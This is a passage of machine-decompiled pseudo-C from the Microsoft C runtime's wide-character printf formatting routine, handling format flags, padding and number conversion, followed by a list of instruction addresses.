												__ecx =  *(__ebp - 0x24) + 1;
												__eflags = __ecx;
												 *(__ebp - 0x24) = __ecx;
												while(1) {
													L187:
													if( *(_t600 - 0x28) != 0) {
														goto L212;
													}
													goto L188;
												}
											}
											L66:
											_t142 =  *(__ebp - 0x4ec) + 0x423ef0; // 0xcccccc0d
											__eax =  *_t142 & 0x000000ff;
											switch( *((intOrPtr*)(( *_t142 & 0x000000ff) * 4 +  &M00423EB4))) {
												case 0:
													L119:
													 *(__ebp - 0x2c) = 1;
													 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
													__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
													 *(__ebp - 0x454) = __ax;
													goto L120;
												case 1:
													L67:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
													__eflags =  *(__ebp - 0x10) & 0x00000830;
													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
														__edx =  *(__ebp - 0x10);
														__edx =  *(__ebp - 0x10) | 0x00000020;
														__eflags = __edx;
														 *(__ebp - 0x10) = __edx;
													}
													goto L69;
												case 2:
													L82:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
													__eflags =  *(__ebp - 0x10) & 0x00000830;
													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
														__ecx =  *(__ebp - 0x10);
														__ecx =  *(__ebp - 0x10) | 0x00000020;
														__eflags = __ecx;
														 *(__ebp - 0x10) = __ecx;
													}
													goto L84;
												case 3:
													L143:
													 *(__ebp - 0x460) = 7;
													goto L145;
												case 4:
													L75:
													__eax = __ebp + 0x14;
													 *(__ebp - 0x474) = E0041F270(__ebp + 0x14);
													__eflags =  *(__ebp - 0x474);
													if( *(__ebp - 0x474) == 0) {
														L77:
														__edx =  *0x4bc060; // 0x408114
														 *(__ebp - 4) = __edx;
														__eax =  *(__ebp - 4);
														 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
														L81:
														goto L187;
													}
													L76:
													__ecx =  *(__ebp - 0x474);
													__eflags =  *(__ecx + 4);
													if( *(__ecx + 4) != 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
														__eflags =  *(__ebp - 0x10) & 0x00000800;
														if(( *(__ebp - 0x10) & 0x00000800) == 0) {
															 *(__ebp - 0xc) = 0;
															__edx =  *(__ebp - 0x474);
															__eax =  *(__edx + 4);
															 *(__ebp - 4) =  *(__edx + 4);
															__ecx =  *(__ebp - 0x474);
															__edx =  *__ecx;
															 *(__ebp - 0x24) =  *__ecx;
														} else {
															__edx =  *(__ebp - 0x474);
															__eax =  *(__edx + 4);
															 *(__ebp - 4) =  *(__edx + 4);
															__ecx =  *(__ebp - 0x474);
															__eax =  *__ecx;
															asm("cdq");
															 *__ecx - __edx =  *__ecx - __edx >> 1;
															 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
															 *(__ebp - 0xc) = 1;
														}
														goto L81;
													}
													goto L77;
												case 5:
													L120:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													__edx = __ebp - 0x448;
													 *(__ebp - 4) = __ebp - 0x448;
													 *(__ebp - 0x44) = 0x200;
													__eflags =  *(__ebp - 0x30);
													if( *(__ebp - 0x30) >= 0) {
														L122:
														__eflags =  *(__ebp - 0x30);
														if( *(__ebp - 0x30) != 0) {
															L125:
															__eflags =  *(__ebp - 0x30) - 0x200;
															if( *(__ebp - 0x30) > 0x200) {
																 *(__ebp - 0x30) = 0x200;
															}
															L127:
															__eflags =  *(__ebp - 0x30) - 0xa3;
															if( *(__ebp - 0x30) > 0xa3) {
																__ecx =  *(__ebp - 0x30);
																__ecx =  *(__ebp - 0x30) + 0x15d;
																 *(__ebp - 0x20) = L0040E5B0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																__eflags =  *(__ebp - 0x20);
																if( *(__ebp - 0x20) == 0) {
																	 *(__ebp - 0x30) = 0xa3;
																} else {
																	__edx =  *(__ebp - 0x20);
																	 *(__ebp - 4) =  *(__ebp - 0x20);
																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																}
															}
															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
															__edx =  *(__ebp + 0x14);
															__eax =  *(__edx - 8);
															__ecx =  *(__edx - 4);
															 *(__ebp - 0x490) =  *(__edx - 8);
															 *(__ebp - 0x48c) =  *(__edx - 4);
															__ecx = __ebp - 0x40;
															_push(E004103A0(__ebp - 0x40));
															__edx =  *(__ebp - 0x2c);
															_push( *(__ebp - 0x2c));
															__eax =  *(__ebp - 0x30);
															_push( *(__ebp - 0x30));
															__ecx =  *(__ebp - 0x454);
															_push( *(__ebp - 0x454));
															__edx =  *(__ebp - 0x44);
															_push( *(__ebp - 0x44));
															__eax =  *(__ebp - 4);
															_push( *(__ebp - 4));
															__ecx = __ebp - 0x490;
															_push(__ebp - 0x490);
															__edx =  *0x4bb808; // 0x776010b9
															E00411D00(__edx) =  *__eax();
															__esp = __esp + 0x1c;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
															__eflags =  *(__ebp - 0x10) & 0x00000080;
															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) == 0) {
																	__ecx = __ebp - 0x40;
																	_push(E004103A0(__ebp - 0x40));
																	__ecx =  *(__ebp - 4);
																	_push( *(__ebp - 4));
																	__edx =  *0x4bb814; // 0x776010b9
																	E00411D00(__edx) =  *__eax();
																	__esp = __esp + 8;
																}
															}
															__eax =  *(__ebp - 0x454) & 0x0000ffff;
															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
															if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																__eflags =  *(__ebp - 0x10) & 0x00000080;
																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																	__ecx = __ebp - 0x40;
																	_push(E004103A0(__ebp - 0x40));
																	__edx =  *(__ebp - 4);
																	_push( *(__ebp - 4));
																	__eax =  *0x4bb810; // 0x776010b9
																	__eax =  *__eax();
																	__esp = __esp + 8;
																}
															}
															__ecx =  *(__ebp - 4);
															__edx =  *( *(__ebp - 4));
															__eflags =  *( *(__ebp - 4)) - 0x2d;
															if( *( *(__ebp - 4)) == 0x2d) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																__ecx =  *(__ebp - 4);
																__ecx =  *(__ebp - 4) + 1;
																__eflags = __ecx;
																 *(__ebp - 4) = __ecx;
															}
															__edx =  *(__ebp - 4);
															 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
															do {
																L187:
																if( *(_t600 - 0x28) != 0) {
																	goto L212;
																}
																goto L188;
															} while ( *(__ebp - 0x4ec) > 0x37);
															goto L66;
														}
														L123:
														__eax =  *(__ebp - 0x454) & 0x0000ffff;
														__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
														if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
															goto L125;
														}
														L124:
														 *(__ebp - 0x30) = 1;
														goto L127;
													}
													L121:
													 *(__ebp - 0x30) = 6;
													goto L127;
												case 6:
													L69:
													 *(__ebp - 0xc) = 1;
													__ebp + 0x14 = E0041F270(__ebp + 0x14);
													 *(__ebp - 0x458) = __ax;
													__ecx =  *(__ebp - 0x10);
													__ecx =  *(__ebp - 0x10) & 0x00000020;
													__eflags = __ecx;
													if(__ecx == 0) {
														 *(__ebp - 0x448) =  *(__ebp - 0x458);
													} else {
														 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
														 *(__ebp - 0x470) = __dl;
														 *((char*)(__ebp - 0x46f)) = 0;
														__ecx = __ebp - 0x40;
														__eax = E004103A0(__ebp - 0x40);
														__ecx = __ebp - 0x40;
														E004103A0(__ebp - 0x40) =  *__eax;
														__ecx =  *(__ebp - 0x448 + 0xac);
														__edx = __ebp - 0x470;
														__eax = __ebp - 0x448;
														__eax = E00420B60(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
														__eflags = __eax;
														if(__eax < 0) {
															 *(__ebp - 0x28) = 1;
														}
													}
													__edx = __ebp - 0x448;
													 *(__ebp - 4) = __ebp - 0x448;
													 *(__ebp - 0x24) = 1;
													while(1) {
														L187:
														if( *(_t600 - 0x28) != 0) {
															goto L212;
														}
														goto L188;
													}
												case 7:
													L140:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 8) = 0xa;
													goto L150;
												case 8:
													goto L0;
												case 9:
													L148:
													 *(__ebp - 8) = 8;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
													__eflags =  *(__ebp - 0x10) & 0x00000080;
													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
														__edx =  *(__ebp - 0x10);
														__edx =  *(__ebp - 0x10) | 0x00000200;
														__eflags = __edx;
														 *(__ebp - 0x10) = __edx;
													}
													goto L150;
												case 0xa:
													L142:
													 *(__ebp - 0x30) = 8;
													goto L143;
												case 0xb:
													L84:
													__eflags =  *(__ebp - 0x30) - 0xffffffff;
													if( *(__ebp - 0x30) != 0xffffffff) {
														__edx =  *(__ebp - 0x30);
														 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
													} else {
														 *(__ebp - 0x4f0) = 0x7fffffff;
													}
													__eax =  *(__ebp - 0x4f0);
													 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
													__ecx = __ebp + 0x14;
													 *(__ebp - 4) = E0041F270(__ebp + 0x14);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
													__eflags =  *(__ebp - 0x10) & 0x00000020;
													if(( *(__ebp - 0x10) & 0x00000020) == 0) {
														L98:
														__eflags =  *(__ebp - 4);
														if( *(__ebp - 4) == 0) {
															__ecx =  *0x4bc064; // 0x408104
															 *(__ebp - 4) = __ecx;
														}
														 *(__ebp - 0xc) = 1;
														__edx =  *(__ebp - 4);
														 *(__ebp - 0x480) =  *(__ebp - 4);
														while(1) {
															L101:
															__eax =  *(__ebp - 0x47c);
															__ecx =  *(__ebp - 0x47c);
															__ecx =  *(__ebp - 0x47c) - 1;
															 *(__ebp - 0x47c) = __ecx;
															__eflags =  *(__ebp - 0x47c);
															if( *(__ebp - 0x47c) == 0) {
																break;
															}
															L102:
															__edx =  *(__ebp - 0x480);
															__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
															__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
															if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
																break;
															}
															L103:
															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
														}
														L104:
														__edx =  *(__ebp - 0x480);
														__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
														__eflags = __edx;
														 *(__ebp - 0x24) = __edx;
														goto L105;
													} else {
														L88:
														__eflags =  *(__ebp - 4);
														if( *(__ebp - 4) == 0) {
															__eax =  *0x4bc060; // 0x408114
															 *(__ebp - 4) = __eax;
														}
														__ecx =  *(__ebp - 4);
														 *(__ebp - 0x478) = __ecx;
														 *(__ebp - 0x24) = 0;
														while(1) {
															L92:
															__eax =  *(__ebp - 0x24);
															__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
															if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
																break;
															}
															L93:
															__ecx =  *(__ebp - 0x478);
															__edx =  *__ecx;
															__eflags =  *__ecx;
															if( *__ecx == 0) {
																break;
															}
															L94:
															__ecx = __ebp - 0x40;
															E004103A0(__ebp - 0x40) =  *(__ebp - 0x478);
															__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
															__eax = E00420DA0( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__ebp - 0x478);
																__edx =  *(__ebp - 0x478) + 1;
																__eflags = __edx;
																 *(__ebp - 0x478) = __edx;
															}
															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
															__edx =  *(__ebp - 0x24);
															__edx =  *(__ebp - 0x24) + 1;
															__eflags = __edx;
															 *(__ebp - 0x24) = __edx;
														}
														L97:
														L105:
														while(1) {
															L187:
															if( *(_t600 - 0x28) != 0) {
																goto L212;
															}
															goto L188;
														}
													}
												case 0xc:
													L141:
													 *(__ebp - 8) = 0xa;
													goto L150;
												case 0xd:
													L144:
													 *(__ebp - 0x460) = 0x27;
													L145:
													 *(__ebp - 8) = 0x10;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
													__eflags =  *(__ebp - 0x10) & 0x00000080;
													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
														__edx = 0x30;
														 *((short*)(__ebp - 0x14)) = __dx;
														 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
														__eflags =  *(__ebp - 0x460) + 0x51;
														 *(__ebp - 0x12) = __ax;
														 *(__ebp - 0x1c) = 2;
													}
													L150:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
													__eflags =  *(__ebp - 0x10) & 0x00008000;
													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
														__eflags =  *(__ebp - 0x10) & 0x00001000;
														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
															__eflags =  *(__ebp - 0x10) & 0x00000020;
															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																__eflags =  *(__ebp - 0x10) & 0x00000040;
																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																	__ecx = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	__edx = 0;
																	__eflags = 0;
																	 *(__ebp - 0x4a0) = __eax;
																	 *(__ebp - 0x49c) = 0;
																} else {
																	__eax = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	asm("cdq");
																	 *(__ebp - 0x4a0) = __eax;
																	 *(__ebp - 0x49c) = __edx;
																}
															} else {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																__eflags =  *(__ebp - 0x10) & 0x00000040;
																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																	__ecx = __ebp + 0x14;
																	E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																	asm("cdq");
																	 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
																	 *(__ebp - 0x49c) = __edx;
																} else {
																	__eax = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	__ax = __eax;
																	asm("cdq");
																	 *(__ebp - 0x4a0) = __eax;
																	 *(__ebp - 0x49c) = __edx;
																}
															}
														} else {
															__eax = __ebp + 0x14;
															 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
															 *(__ebp - 0x49c) = __edx;
														}
													} else {
														__ecx = __ebp + 0x14;
														 *(__ebp - 0x4a0) = E0041F290(__ebp + 0x14);
														 *(__ebp - 0x49c) = __edx;
													}
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
													__eflags =  *(__ebp - 0x10) & 0x00000040;
													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
														L167:
														__ecx =  *(__ebp - 0x4a0);
														 *(__ebp - 0x4a8) =  *(__ebp - 0x4a0);
														__edx =  *(__ebp - 0x49c);
														 *(__ebp - 0x4a4) =  *(__ebp - 0x49c);
														goto L168;
													} else {
														L163:
														__eflags =  *(__ebp - 0x49c);
														if(__eflags > 0) {
															goto L167;
														}
														L164:
														if(__eflags < 0) {
															L166:
															 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
															__edx =  *(__ebp - 0x49c);
															asm("adc edx, 0x0");
															__edx =  ~( *(__ebp - 0x49c));
															 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
															 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
															L168:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
															__eflags =  *(__ebp - 0x10) & 0x00008000;
															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																__eflags =  *(__ebp - 0x10) & 0x00001000;
																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																	__edx =  *(__ebp - 0x4a8);
																	__eax =  *(__ebp - 0x4a4);
																	__eax =  *(__ebp - 0x4a4) & 0x00000000;
																	__eflags = __eax;
																	 *(__ebp - 0x4a4) = __eax;
																}
															}
															__eflags =  *(__ebp - 0x30);
															if( *(__ebp - 0x30) >= 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
																__eflags =  *(__ebp - 0x30) - 0x200;
																if( *(__ebp - 0x30) > 0x200) {
																	 *(__ebp - 0x30) = 0x200;
																}
															} else {
																 *(__ebp - 0x30) = 1;
															}
															 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
															__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
															if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
																 *(__ebp - 0x1c) = 0;
															}
															__eax = __ebp - 0x249;
															 *(__ebp - 4) = __ebp - 0x249;
															while(1) {
																L178:
																__ecx =  *(__ebp - 0x30);
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) > 0) {
																	goto L180;
																}
																L179:
																 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
																__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
																if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
																	goto L183;
																}
																L180:
																__eax =  *(__ebp - 8);
																asm("cdq");
																__ecx =  *(__ebp - 0x4a4);
																__edx =  *(__ebp - 0x4a8);
																__eax = E00421720( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8),  *(__ebp - 0x4a8));
																 *(__ebp - 0x494) = __eax;
																__eax =  *(__ebp - 8);
																asm("cdq");
																__eax =  *(__ebp - 0x4a4);
																__ecx =  *(__ebp - 0x4a8);
																 *(__ebp - 0x4a8) = E004216B0( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8), __edx);
																 *(__ebp - 0x4a4) = __edx;
																__eflags =  *(__ebp - 0x494) - 0x39;
																if( *(__ebp - 0x494) > 0x39) {
																	__edx =  *(__ebp - 0x494);
																	__edx =  *(__ebp - 0x494) +  *(__ebp - 0x460);
																	__eflags = __edx;
																	 *(__ebp - 0x494) = __edx;
																}
																__eax =  *(__ebp - 4);
																 *( *(__ebp - 4)) =  *(__ebp - 0x494);
																 *(__ebp - 4) =  *(__ebp - 4) - 1;
																 *(__ebp - 4) =  *(__ebp - 4) - 1;
																L178:
																__ecx =  *(__ebp - 0x30);
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) > 0) {
																	goto L180;
																}
																goto L179;
															}
														}
														L165:
														__eflags =  *(__ebp - 0x4a0);
														if( *(__ebp - 0x4a0) >= 0) {
															goto L167;
														}
														goto L166;
													}
												case 0xe:
													while(1) {
														L187:
														if( *(_t600 - 0x28) != 0) {
															goto L212;
														}
														goto L188;
													}
											}
										case 8:
											L24:
											__ecx =  *(__ebp - 0x10);
											__ecx =  *(__ebp - 0x10) | 0x00000002;
											 *(__ebp - 0x10) = __ecx;
											goto L27;
										case 9:
											L25:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
											goto L27;
										case 0xa:
											L23:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
											goto L27;
										case 0xb:
											L22:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
											goto L27;
										case 0xc:
											L26:
											__eax =  *(__ebp - 0x10);
											__eax =  *(__ebp - 0x10) | 0x00000008;
											__eflags = __eax;
											 *(__ebp - 0x10) = __eax;
											goto L27;
										case 0xd:
											L27:
											goto L214;
									}
								} else {
									_t574 = 0;
									if(0 == 0) {
										 *(_t600 - 0x4dc) = 0;
									} else {
										 *(_t600 - 0x4dc) = 1;
									}
									 *(_t600 - 0x46c) =  *(_t600 - 0x4dc);
									if( *(_t600 - 0x46c) == 0) {
										_push(L"(\"Incorrect format specifier\", 0)");
										_push(0);
										_push(0x460);
										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
										_push(2);
										_t501 = L0040C820();
										_t603 = _t603 + 0x14;
										if(_t501 == 1) {
											asm("int3");
										}
									}
									L14:
									if( *(_t600 - 0x46c) != 0) {
										goto L16;
									} else {
										 *((intOrPtr*)(L00411810(_t546))) = 0x16;
										E0040C660(_t534, _t546, _t598, _t599, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
										 *(_t600 - 0x4c8) = 0xffffffff;
										E00410370(_t600 - 0x40);
										_t486 =  *(_t600 - 0x4c8);
										goto L225;
									}
								}
							}
							L215:
							if( *(_t600 - 0x45c) == 0) {
								L218:
								 *(_t600 - 0x4f8) = 1;
								L219:
								_t574 =  *(_t600 - 0x4f8);
								 *(_t600 - 0x4bc) =  *(_t600 - 0x4f8);
								if( *(_t600 - 0x4bc) == 0) {
									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
									_push(0);
									_push(0x8f5);
									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
									_push(2);
									_t491 = L0040C820();
									_t603 = _t603 + 0x14;
									if(_t491 == 1) {
										asm("int3");
									}
								}
								if( *(_t600 - 0x4bc) != 0) {
									 *(_t600 - 0x4d4) =  *(_t600 - 0x44c);
									E00410370(_t600 - 0x40);
									_t486 =  *(_t600 - 0x4d4);
								} else {
									 *((intOrPtr*)(L00411810(_t538))) = 0x16;
									E0040C660(_t534, _t538, _t598, _t599, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
									 *(_t600 - 0x4d0) = 0xffffffff;
									E00410370(_t600 - 0x40);
									_t486 =  *(_t600 - 0x4d0);
								}
								goto L225;
							}
							L216:
							if( *(_t600 - 0x45c) == 7) {
								goto L218;
							}
							L217:
							 *(_t600 - 0x4f8) = 0;
							goto L219;
						}
					} else {
						L113:
						 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
						__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
						 *(__ebp - 0x4cc) = 0xffffffff;
						__ecx = __ebp - 0x40;
						__eax = E00410370(__ecx);
						__eax =  *(__ebp - 0x4cc);
						L225:
						return E00410900(_t486, _t534,  *(_t600 - 0x48) ^ _t600, _t574, _t598, _t599);
					}
					L115:
					if(( *(_t600 - 0x10) & 0x00000020) == 0) {
						 *( *(_t600 - 0x484)) =  *(_t600 - 0x44c);
					} else {
						 *( *(_t600 - 0x484)) =  *(_t600 - 0x44c);
					}
					 *(_t600 - 0x28) = 1;
					goto L187;
				}
			}

0x0042359a
0x0042359a
0x0042359a
0x0042359e
0x004235a3
0x004235a6
0x004235b3
0x00000000
0x00000000
0x004235b9
0x004235b9
0x004235bb
0x004235c9
0x004235bd
0x004235bd
0x004235bd
0x004235d3
0x004235d9
0x004235e6
0x004235e8
0x004235ed
0x004235ef
0x004235f4
0x004235f9
0x004235fb
0x00423600
0x00423606
0x00423608
0x00423608
0x00423606
0x00423610
0x00423658
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00423b5a
0x00423b60
0x00423b6a
0x00423b84
0x00423b9e
0x00423ba5
0x00423ba9
0x00423ba9
0x00423b86
0x00423b8b
0x00423b8f
0x00423b8f
0x00423b6c
0x00423b71
0x00423b75
0x00423b75
0x00423b6a
0x00423bb9
0x00423bc5
0x00423bdb
0x00423be0
0x00423be0
0x00423bf6
0x00423bfb
0x00423c04
0x00423c0c
0x00423c22
0x00423c27
0x00423c27
0x00423c0c
0x00423c2e
0x00423ce8
0x00423cfb
0x00423d00
0x00000000
0x00423c34
0x00423c34
0x00423c38
0x00000000
0x00000000
0x00423c3e
0x00423c41
0x00423c4a
0x00423c50
0x00423c50
0x00423c5f
0x00423c67
0x00000000
0x00000000
0x00423c69
0x00423c6c
0x00423c91
0x00423c96
0x00423c99
0x00423ca6
0x00423cb4
0x00423cc7
0x00423ccc
0x00423cdb
0x00000000
0x00423cdb
0x00423ca8
0x00423ca8
0x00000000
0x00423ca8
0x00423ce6
0x00423d03
0x00423d0a
0x00423d12
0x00423d28
0x00423d2d
0x00423d2d
0x00423d12
0x00423d0a
0x00423d30
0x00423d34
0x00423d3c
0x00423d41
0x00423d44
0x00423d44
0x00423d4b
0x00423d4b
0x00422ecb
0x00422ed2
0x00422edf
0x00422ee4
0x00000000
0x00422ef7
0x00422f01
0x00422f28
0x00422f0f
0x00422f20
0x00422f20
0x00422f01
0x00422f32
0x00422f38
0x00422f44
0x00422f47
0x00422f55
0x00422f58
0x00422f65
0x0042300a
0x00423010
0x0042301d
0x00000000
0x00000000
0x00423023
0x00423029
0x00000000
0x00423030
0x00423030
0x0042304a
0x0042304f
0x00000000
0x00000000
0x00423057
0x00423057
0x0042305e
0x00423061
0x00423064
0x00423067
0x0042306a
0x0042306d
0x00423070
0x00423077
0x0042307e
0x00000000
0x00000000
0x0042308a
0x0042308a
0x00423091
0x0042309d
0x004230a0
0x004230a6
0x004230ad
0x00000000
0x00000000
0x004230af
0x004230b5
0x004230b5
0x004230bc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00423100
0x00423100
0x00423107
0x0042310a
0x00423134
0x00423137
0x00423137
0x00423141
0x00423141
0x00423145
0x0042310c
0x0042310c
0x00423118
0x0042311b
0x0042311f
0x00423121
0x00423124
0x00423124
0x00423127
0x0042312a
0x0042312d
0x0042312f
0x0042312f
0x00423132
0x00423148
0x00000000
0x00000000
0x0042314d
0x0042314d
0x00000000
0x00000000
0x00423159
0x00423159
0x00423160
0x00423163
0x00423183
0x00423186
0x00423186
0x00423190
0x00423190
0x00423194
0x00423165
0x00423165
0x00423171
0x00423174
0x00423178
0x0042317a
0x0042317a
0x00423181
0x00000000
0x00000000
0x0042319c
0x0042319c
0x004231a3
0x004231af
0x004231b2
0x004231b8
0x004231bf
0x004232d2
0x00000000
0x004232d2
0x004231c5
0x004231cb
0x004231cb
0x004231d2
0x00000000
0x00423209
0x00423209
0x0042320c
0x0042320f
0x00423212
0x00423239
0x00423239
0x0042323c
0x0042323f
0x00423242
0x00423266
0x00423266
0x00423269
0x0042326c
0x0042326f
0x004232a8
0x004232b9
0x00000000
0x004232b9
0x00423271
0x00423271
0x00423274
0x00423277
0x0042327a
0x00000000
0x00000000
0x0042327c
0x0042327c
0x0042327f
0x00423282
0x00423285
0x00000000
0x00000000
0x00423287
0x00423287
0x0042328a
0x0042328d
0x00423290
0x00000000
0x00000000
0x00423292
0x00423292
0x00423295
0x00423298
0x0042329b
0x00000000
0x00000000
0x0042329d
0x0042329d
0x004232a0
0x004232a3
0x004232a6
0x004232aa
0x00000000
0x004232aa
0x00000000
0x004232a6
0x00423244
0x00423244
0x00423247
0x0042324b
0x0042324e
0x00000000
0x00423250
0x00423253
0x00423256
0x0042325c
0x00423261
0x00000000
0x00423261
0x0042324e
0x00423214
0x00423214
0x00423217
0x0042321b
0x0042321e
0x00000000
0x00423220
0x00423223
0x00423226
0x0042322c
0x00423231
0x00000000
0x00423231
0x00000000
0x004232bb
0x004232bb
0x004232be
0x004232c1
0x00000000
0x00000000
0x004231d9
0x004231d9
0x004231dc
0x004231df
0x004231e2
0x004231fb
0x004231fe
0x004231fe
0x00423201
0x004231e4
0x004231e4
0x004231e7
0x004231ea
0x004231f0
0x004231f6
0x004231f6
0x00000000
0x00000000
0x004232c6
